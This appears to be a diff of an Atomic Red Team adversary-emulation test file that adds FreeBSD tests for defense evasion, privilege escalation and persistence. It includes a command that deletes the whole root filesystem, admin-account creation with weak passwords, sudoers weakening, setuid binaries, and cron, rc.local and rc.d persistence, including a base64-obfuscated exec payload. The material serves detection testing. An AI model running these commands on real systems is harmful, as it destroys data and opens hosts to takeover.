- name: Delete Filesystem - FreeBSD
|
||||
auto_generated_guid: b5aaca7e-a48f-4f1b-8f0f-a27b8f516608
|
||||
description: 'This test deletes the entire root filesystem of a FreeBSD system.
|
||||
This technique was used by Amnesia IoT malware to avoid analysis. This test
|
||||
is dangerous and destructive, do NOT use on production equipment.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
chflags -R 0 /
|
||||
rm -rf / > /dev/null 2> /dev/null
|
||||
name: sh
|
||||
T1158:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -17285,6 +18012,22 @@ defense-evasion:
|
||||
chmod +x 'testdirwithspaceend /init '
|
||||
'./testdirwithspaceend /init '
|
||||
cleanup_command: rm -rf /tmp/atomic-test-T1036.006
|
||||
- name: Space After Filename (FreeBSD)
|
||||
auto_generated_guid: cfc1fbb5-caae-4f4c-bfa8-1b7c8b5cc4e8
|
||||
description: 'Space after filename.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
command: "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir
|
||||
-p 'testdirwithspaceend '\n/bin/echo \"#\\!/bin/sh\" > \"testdirwithspaceend
|
||||
/init \" && echo 'echo \"print(\\\"running T1035.006 with space after filename
|
||||
to masquerade init\\\")\" | python3.9' >> \"testdirwithspaceend /init \"
|
||||
&& echo \"exit\" >> \"testdirwithspaceend /init \" \nchmod +x 'testdirwithspaceend
|
||||
/init '\n'./testdirwithspaceend /init '\n"
|
||||
cleanup_command: rm -rf /tmp/atomic-test-T1036.006
|
||||
T1550.002:
|
||||
technique:
|
||||
modified: '2023-03-30T21:01:45.141Z'
|
||||
@@ -17923,7 +18666,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -19039,6 +19781,23 @@ defense-evasion:
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "userdel -r art \n"
|
||||
- name: Create local account (FreeBSD)
|
||||
auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
|
||||
description: 'An adversary may wish to create an account with admin privileges
|
||||
to work with. In this test we create a "art" user with the password art, switch
|
||||
to art, execute whoami, exit and delete the art user.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
|
||||
| pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n"
|
||||
cleanup_command: 'rmuser -y art
|
||||
|
||||
'
|
||||
- name: Reactivate a locked/expired account (Linux)
|
||||
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
|
||||
description: "A system administrator may have locked and expired a user account
|
||||
@@ -19062,6 +19821,30 @@ defense-evasion:
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "userdel -r art \n"
|
||||
- name: Reactivate a locked/expired account (FreeBSD)
|
||||
auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf'
|
||||
description: "A system administrator may have locked and expired a user account
|
||||
rather than deleting it. \"the user is coming back, at some stage\" An adversary
|
||||
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
|
||||
this test we create a \"art\" user with the password art, lock and expire
|
||||
the account, try to su to art and fail, unlock and renew the account, su successfully,
|
||||
then delete the account.\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
pw useradd art -g wheel -s /bin/sh
|
||||
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
|
||||
pw lock art
|
||||
pw usermod art -e +1d
|
||||
pw unlock art
|
||||
pw user mod art -e +99d
|
||||
su art
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "rmuser -y art \n"
|
||||
- name: Login as nobody (Linux)
|
||||
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
|
||||
description: 'An adversary may try to re-purpose a system account to appear
|
||||
@@ -19080,6 +19863,26 @@ defense-evasion:
|
||||
nobody\nsu nobody\nwhoami\nexit\n"
|
||||
cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep
|
||||
nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
|
||||
- name: Login as nobody (freebsd)
|
||||
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
|
||||
description: 'An adversary may try to re-purpose a system account to appear
|
||||
legitimate. In this test change the login shell of the nobody account, change
|
||||
its password to nobody, su to nobody, exit, then reset nobody''s shell to
|
||||
/usr/sbin/nologin.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged
|
||||
user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho
|
||||
$(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n"
|
||||
cleanup_command: |
|
||||
pw usermod nobody -s /usr/sbin/nologin
|
||||
cat /etc/passwd |grep nobody
|
||||
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
|
||||
T1211:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -20427,6 +21230,27 @@ privilege-escalation:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n"
|
||||
- name: Sudo usage (freebsd)
|
||||
auto_generated_guid: 2bf9a018-4664-438a-b435-cc6f8c6f71b1
|
||||
description: 'Common Sudo enumeration methods.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n"
|
||||
- name: Unlimited sudo cache timeout
|
||||
auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc
|
||||
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
|
||||
@@ -20443,6 +21267,31 @@ privilege-escalation:
|
||||
command: |
|
||||
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
|
||||
sudo visudo -c -f /etc/sudoers
|
||||
- name: Unlimited sudo cache timeout (freebsd)
|
||||
auto_generated_guid: a83ad6e8-6f24-4d7f-8f44-75f8ab742991
|
||||
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
|
||||
This is dangerous to modify without using ''visudo'', do not do this on a
|
||||
production system.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers
|
||||
sudo visudo -c -f /usr/local/etc/sudoers
|
||||
- name: Disable tty_tickets for sudo caching
|
||||
auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1
|
||||
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
|
||||
@@ -20458,6 +21307,30 @@ privilege-escalation:
|
||||
command: |
|
||||
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
|
||||
sudo visudo -c -f /etc/sudoers
|
||||
- name: Disable tty_tickets for sudo caching (freebsd)
|
||||
auto_generated_guid: 4df6a0fe-2bdd-4be8-8618-a6a19654a57a
|
||||
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
|
||||
to modify without using ''visudo'', do not do this on a production system.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
sudo sh -c "echo Defaults "'!'"tty_tickets >> /usr/local/etc/sudoers"
|
||||
sudo visudo -c -f /usr/local/etc/sudoers
|
||||
T1574.011:
|
||||
technique:
|
||||
modified: '2023-03-30T21:01:38.651Z'
|
||||
@@ -21218,9 +22091,8 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -21271,6 +22143,33 @@ privilege-escalation:
|
||||
rm /etc/cron.hourly/#{cron_script_name}
|
||||
rm /etc/cron.monthly/#{cron_script_name}
|
||||
rm /etc/cron.weekly/#{cron_script_name}
|
||||
- name: Cron - Add script to /etc/cron.d folder
|
||||
auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846'
|
||||
description: 'This test adds a script to /etc/cron.d folder configured to execute
|
||||
on a schedule.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
type: string
|
||||
default: echo '*/5 * * * * root echo "Hello
|
||||
from Atomic Red Team"' > /tmp/atomic.log
|
||||
cron_script_name:
|
||||
description: Name of file to store in cron folder
|
||||
type: string
|
||||
default: persistevil
|
||||
executor:
|
||||
elevation_required: true
|
||||
name: sh
|
||||
command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name}
|
||||
|
||||
'
|
||||
cleanup_command: 'rm /etc/cron.d/#{cron_script_name}
|
||||
|
||||
'
|
||||
- name: Cron - Add script to /var/spool/cron/crontabs/ folder
|
||||
auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
|
||||
description: 'This test adds a script to a /var/spool/cron/crontabs folder configured
|
||||
@@ -23220,6 +24119,32 @@ privilege-escalation:
|
||||
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
|
||||
EXIT''
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f /tmp/art-fish.txt
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Trap EXIT (freebsd)
|
||||
auto_generated_guid: be1a5d70-6865-44aa-ab50-42244c9fd16f
|
||||
description: |
|
||||
Launch bash shell with command arg to create TRAP on EXIT.
|
||||
The trap executes script that writes to /tmp/art-fish.txt
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if bash is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y bash)\n"
|
||||
executor:
|
||||
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
|
||||
EXIT''
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f /tmp/art-fish.txt
|
||||
|
||||
@@ -23237,6 +24162,32 @@ privilege-escalation:
|
||||
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
|
||||
SIGINT && kill -SIGINT $$''
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f /tmp/art-fish.txt
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Trap SIGINT (freebsd)
|
||||
auto_generated_guid: ade10242-1eac-43df-8412-be0d4c704ada
|
||||
description: |
|
||||
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
|
||||
The trap executes script that writes to /tmp/art-fish.txt
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if bash is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y bash)\n"
|
||||
executor:
|
||||
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
|
||||
SIGINT && kill -SIGINT $$''
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f /tmp/art-fish.txt
|
||||
|
||||
@@ -23904,6 +24855,32 @@ privilege-escalation:
|
||||
sudo rm /tmp/hello.c
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Make and modify binary from C source (freebsd)
|
||||
auto_generated_guid: dd580455-d84b-481b-b8b0-ac96f3b1dc4c
|
||||
description: 'Make, change owner, and change file attributes on a C source code
|
||||
file
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
payload:
|
||||
description: hello.c payload
|
||||
type: path
|
||||
default: PathToAtomicsFolder/T1548.001/src/hello.c
|
||||
executor:
|
||||
command: |
|
||||
cp #{payload} /tmp/hello.c
|
||||
chown root /tmp/hello.c
|
||||
make /tmp/hello
|
||||
chown root /tmp/hello
|
||||
chmod u+s /tmp/hello
|
||||
/tmp/hello
|
||||
cleanup_command: |
|
||||
rm /tmp/hello
|
||||
rm /tmp/hello.c
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetUID flag on file
|
||||
auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79
|
||||
description: 'This test sets the SetUID flag on a file in FreeBSD.
|
||||
@@ -23927,6 +24904,28 @@ privilege-escalation:
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetUID flag on file (freebsd)
|
||||
auto_generated_guid: 9be9b827-ff47-4e1b-bef8-217db6fb7283
|
||||
description: 'This test sets the SetUID flag on a file in FreeBSD.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetUID flag
|
||||
type: path
|
||||
default: "/tmp/evilBinary"
|
||||
executor:
|
||||
command: |
|
||||
touch #{file_to_setuid}
|
||||
chown root #{file_to_setuid}
|
||||
chmod u+xs #{file_to_setuid}
|
||||
cleanup_command: 'rm #{file_to_setuid}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetGID flag on file
|
||||
auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c
|
||||
description: 'This test sets the SetGID flag on a file in Linux and macOS.
|
||||
@@ -23950,6 +24949,28 @@ privilege-escalation:
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetGID flag on file (freebsd)
|
||||
auto_generated_guid: 1f73af33-62a8-4bf1-bd10-3bea931f2c0d
|
||||
description: 'This test sets the SetGID flag on a file in FreeBSD.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetGID flag
|
||||
type: path
|
||||
default: "/tmp/evilBinary"
|
||||
executor:
|
||||
command: |
|
||||
touch #{file_to_setuid}
|
||||
chown root #{file_to_setuid}
|
||||
chmod g+xs #{file_to_setuid}
|
||||
cleanup_command: 'rm #{file_to_setuid}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Make and modify capabilities of a binary
|
||||
auto_generated_guid: db53959c-207d-4000-9e7a-cd8eb417e072
|
||||
description: |
|
||||
@@ -24003,7 +25024,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -4000
|
||||
@@ -24017,7 +25037,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -2000
|
||||
@@ -26940,6 +27959,26 @@ privilege-escalation:
|
||||
head -n '-2' ~/.bashrc > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bashrc
|
||||
name: sh
|
||||
- name: Add command to .shrc
|
||||
auto_generated_guid: 41502021-591a-4649-8b6e-83c9192aff53
|
||||
description: 'Adds a command to the .shrc file of the current user
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
command_to_add:
|
||||
description: Command to add to the .shrc file
|
||||
type: string
|
||||
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
|
||||
executor:
|
||||
command: 'echo ''#{command_to_add}'' >> ~/.shrc
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
head -n '-2' ~/.shrc > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.shrc
|
||||
name: sh
|
||||
- name: Append to the system shell profile
|
||||
auto_generated_guid: 694b3cc8-6a78-4d35-9e74-0123d009e94b
|
||||
description: 'An adversary may wish to establish persistence by executing malicious
|
||||
@@ -26947,7 +27986,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
text_to_append:
|
||||
@@ -26970,7 +28008,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
text_to_append:
|
||||
@@ -28466,6 +29503,27 @@ privilege-escalation:
|
||||
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
|
||||
sudo rm $origfilename;fi
|
||||
|
||||
'
|
||||
- name: rc.local (FreeBSD)
|
||||
auto_generated_guid: 2015fb48-8ab6-4fbf-928b-0b62de5c9476
|
||||
description: 'Modify rc.local
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
|
||||
printf '%s\n' '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local
|
||||
echo 'python3.9 -c "import os, base64;exec(base64.b64decode(\"aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo=\"))"' | sudo tee -a /etc/rc.local
|
||||
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
|
||||
sudo chmod +x /etc/rc.local
|
||||
cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
|
||||
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
|
||||
sudo rm $origfilename;fi
|
||||
|
||||
'
|
||||
T1134:
|
||||
technique:
|
||||
@@ -28741,6 +29799,45 @@ privilege-escalation:
|
||||
rm -rf #{systemd_service_path}/#{systemd_service_file}
|
||||
systemctl daemon-reload
|
||||
name: bash
|
||||
- name: Create SysV Service
|
||||
auto_generated_guid: 760fe8d2-79d9-494f-905e-a239a3df86f6
|
||||
description: 'This test creates a SysV service unit file and enables it as a
|
||||
service.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
rc_service_path:
|
||||
description: Path to rc service file
|
||||
type: path
|
||||
default: "/usr/local/etc/rc.d"
|
||||
rc_service_file:
|
||||
description: File name of rc service file
|
||||
type: string
|
||||
default: art-test
|
||||
executor:
|
||||
command: "echo '#\\!/bin/sh' > #{rc_service_path}/#{rc_service_file}\necho
|
||||
' ' >> #{rc_service_path}/#{rc_service_file}\necho '#' >> #{rc_service_path}/#{rc_service_file}\necho
|
||||
'# PROVIDE: art-test' >> #{rc_service_path}/#{rc_service_file}\necho '#
|
||||
REQUIRE: LOGIN' >> #{rc_service_path}/#{rc_service_file}\necho '# KEYWORD:
|
||||
shutdown' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho
|
||||
'. /etc/rc.subr' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho
|
||||
'name=\"art_test\"' >> #{rc_service_path}/#{rc_service_file}\necho 'rcvar=art_test_enable'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho 'load_rc_config ${name}'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho 'command=\"/usr/bin/touch\"'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho 'start_cmd=\"art_test_start\"'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho '' >> #{rc_service_path}/#{rc_service_file}\necho
|
||||
'art_test_start()' >> #{rc_service_path}/#{rc_service_file} \necho '{'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho ' ${command} /tmp/art-test.marker'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho '}' >> #{rc_service_path}/#{rc_service_file}\necho
|
||||
' ' >> #{rc_service_path}/#{rc_service_file} \necho 'run_rc_command
|
||||
\"$1\"' >> #{rc_service_path}/#{rc_service_file}\nchmod +x #{rc_service_path}/#{rc_service_file}\nservice
|
||||
art-test enable\nservice art-test start\n"
|
||||
cleanup_command: |
|
||||
sysrc -x art_test_enable
|
||||
rm -f #{rc_service_path}/#{rc_service_file}
|
||||
name: sh
|
||||
- name: Create Systemd Service file, Enable the service , Modify and Reload the
|
||||
service.
|
||||
auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
|
||||
@@ -29711,6 +30808,39 @@ privilege-escalation:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: 'echo "#{at_command}" | at #{time_spec}'
|
||||
- name: At - Schedule a job freebsd
|
||||
auto_generated_guid: 549863fb-1c91-467e-97fc-1fa32b9f356b
|
||||
description: 'This test submits a command to be run in the future by the `at`
|
||||
daemon.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
time_spec:
|
||||
description: Time specification of when the command should run
|
||||
type: string
|
||||
default: now + 1 minute
|
||||
at_command:
|
||||
description: The command to be run
|
||||
type: string
|
||||
default: echo Hello from Atomic Red Team
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'The `at` executable must exist in the PATH
|
||||
|
||||
'
|
||||
prereq_command: 'which at
|
||||
|
||||
'
|
||||
get_prereq_command: 'echo ''Please install `at` ; they were not found in the
|
||||
PATH (Package name: `at`)''
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: 'echo "#{at_command}" | at #{time_spec}'
|
||||
T1055.001:
|
||||
technique:
|
||||
modified: '2022-10-18T21:07:23.748Z'
|
||||
@@ -30036,6 +31166,23 @@ privilege-escalation:
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "userdel -r art \n"
|
||||
- name: Create local account (FreeBSD)
|
||||
auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
|
||||
description: 'An adversary may wish to create an account with admin privileges
|
||||
to work with. In this test we create a "art" user with the password art, switch
|
||||
to art, execute whoami, exit and delete the art user.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
|
||||
| pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n"
|
||||
cleanup_command: 'rmuser -y art
|
||||
|
||||
'
|
||||
- name: Reactivate a locked/expired account (Linux)
|
||||
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
|
||||
description: "A system administrator may have locked and expired a user account
|
||||
@@ -30059,6 +31206,30 @@ privilege-escalation:
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "userdel -r art \n"
|
||||
- name: Reactivate a locked/expired account (FreeBSD)
|
||||
auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf'
|
||||
description: "A system administrator may have locked and expired a user account
|
||||
rather than deleting it. \"the user is coming back, at some stage\" An adversary
|
||||
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
|
||||
this test we create a \"art\" user with the password art, lock and expire
|
||||
the account, try to su to art and fail, unlock and renew the account, su successfully,
|
||||
then delete the account.\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
pw useradd art -g wheel -s /bin/sh
|
||||
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
|
||||
pw lock art
|
||||
pw usermod art -e +1d
|
||||
pw unlock art
|
||||
pw user mod art -e +99d
|
||||
su art
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "rmuser -y art \n"
|
||||
- name: Login as nobody (Linux)
|
||||
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
|
||||
description: 'An adversary may try to re-purpose a system account to appear
|
||||
@@ -30077,6 +31248,26 @@ privilege-escalation:
|
||||
nobody\nsu nobody\nwhoami\nexit\n"
|
||||
cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep
|
||||
nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
|
||||
- name: Login as nobody (freebsd)
|
||||
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
|
||||
description: 'An adversary may try to re-purpose a system account to appear
|
||||
legitimate. In this test change the login shell of the nobody account, change
|
||||
its password to nobody, su to nobody, exit, then reset nobody''s shell to
|
||||
/usr/sbin/nologin.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged
|
||||
user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho
|
||||
$(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n"
|
||||
cleanup_command: |
|
||||
pw usermod nobody -s /usr/sbin/nologin
|
||||
cat /etc/passwd |grep nobody
|
||||
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
|
||||
T1574.012:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -30849,9 +32040,8 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -30902,6 +32092,33 @@ execution:
|
||||
rm /etc/cron.hourly/#{cron_script_name}
|
||||
rm /etc/cron.monthly/#{cron_script_name}
|
||||
rm /etc/cron.weekly/#{cron_script_name}
|
||||
- name: Cron - Add script to /etc/cron.d folder
|
||||
auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846'
|
||||
description: 'This test adds a script to /etc/cron.d folder configured to execute
|
||||
on a schedule.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
type: string
|
||||
default: echo '*/5 * * * * root echo "Hello
|
||||
from Atomic Red Team"' > /tmp/atomic.log
|
||||
cron_script_name:
|
||||
description: Name of file to store in cron folder
|
||||
type: string
|
||||
default: persistevil
|
||||
executor:
|
||||
elevation_required: true
|
||||
name: sh
|
||||
command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name}
|
||||
|
||||
'
|
||||
cleanup_command: 'rm /etc/cron.d/#{cron_script_name}
|
||||
|
||||
'
|
||||
- name: Cron - Add script to /var/spool/cron/crontabs/ folder
|
||||
auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
|
||||
description: 'This test adds a script to a /var/spool/cron/crontabs folder configured
|
||||
@@ -33103,7 +34320,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -33128,7 +34344,6 @@ execution:
|
||||
|
||||
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -33222,7 +34437,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -33242,7 +34456,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -33260,7 +34473,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -33275,7 +34487,6 @@ execution:
|
||||
|
||||
'
|
||||
